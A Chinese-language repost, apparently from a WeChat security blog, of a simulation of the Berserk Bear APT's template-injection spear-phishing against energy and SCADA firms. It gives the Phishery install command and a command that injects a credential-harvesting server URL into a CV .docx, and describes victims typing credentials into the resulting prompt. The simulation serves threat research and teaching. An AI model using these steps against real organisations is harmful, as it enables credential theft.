这是对 （Berserk Bear） APT 集团针对全球关键基础设施和能源公司的攻击的模拟，主要是在欧洲和美国，攻击活动至少从 2017 年 5 月开始活跃。这种攻击既针对关键基础设施提供商，也针对这些提供商用来提供关键服务的供应商，攻击链从恶意（XML 容器）注入连接到外部服务器的 DOCX 文件 （SMB） 开始，用于静默收集用户凭据，并被用于鱼叉式网络钓鱼攻击。我依靠 Cisco Talos Intelligence Group 来弄清楚进行此模拟的细节：https://blog.talosintelligence.com/template-injection/

如果您需要了解更多关于 Berserk Bear APT 群组攻击的信息：https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Berserk%20Bear%2C%20Dragonfly%202%2E0&n=1

这次攻击包括几个阶段，包括注入 DOCX 文件和使用恶意 XML 容器，该容器创建特定警报以获取凭据并传输到攻击者的服务器，然后他们使用该服务器为鱼叉式网络钓鱼攻击所针对的组织获取数据。DOCX 文件是一份简历，提交给在软件开发和 SCADA 控制系统方面具有十年经验的人。

1. 创建 CV DOCX 文件，该文件将被注入并发送鱼叉式网络钓鱼。

2. 使用网络钓鱼工具注入 DOCX 文件以获取凭据。

3. 凭据网络钓鱼是指目标打开目标 Word 文件并在将向他们显示的通知中输入凭据。

第一阶段（分娩技术）

由于这里的攻击者想以 SCADA 等能源和能源管理系统相关的机构为目标，因此攻击者以简历的形式创建了一个 DOCX 文件来申请工作。似乎有这样的职位空缺，攻击者发送了包含恶意 XML 容器的简历，在这里我创建了一个与他们在实际攻击中使用的简历相同的简历。

第二阶段（植入技术）

根据思科 Talos 情报小组所说，攻击者努力通过网络钓鱼工具注入 DOCX 文件，这是因为在这次攻击时它是一个很久没有发布的工具，这是攻击者利用它最多的地方，也有可能在使用它之前进行了一些修改这次攻击。

Phishery 是一个启用了 Simple SSL 的 HTTP 服务器，其主要目的是通过基本身份验证来获取网络钓鱼凭据。Phishery 还提供了将 URL 轻松注入 .docx Word 文档的功能。

Github 存储库：https://github.com/ryhanson/phishery.git

sudo apt-get install phishery

网络钓鱼 -u https://192.168.138.138 -i CV.docx -o malicious.docx

网络钓鱼

现在，恶意 CV 将被发送到目标并等待 Credentials。

第三阶段（执行技术）

凭据网络钓鱼是指目标打开目标 Word 文件并在将向他们显示的通知中输入凭据。

Github 存储库：https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/blob/main/Russian%20APT%2FBerserk-Bear-APT%2FREADME.md

原文始发于微信公众号（安全狗的自我修养）：Berserk Bear APT 攻击模拟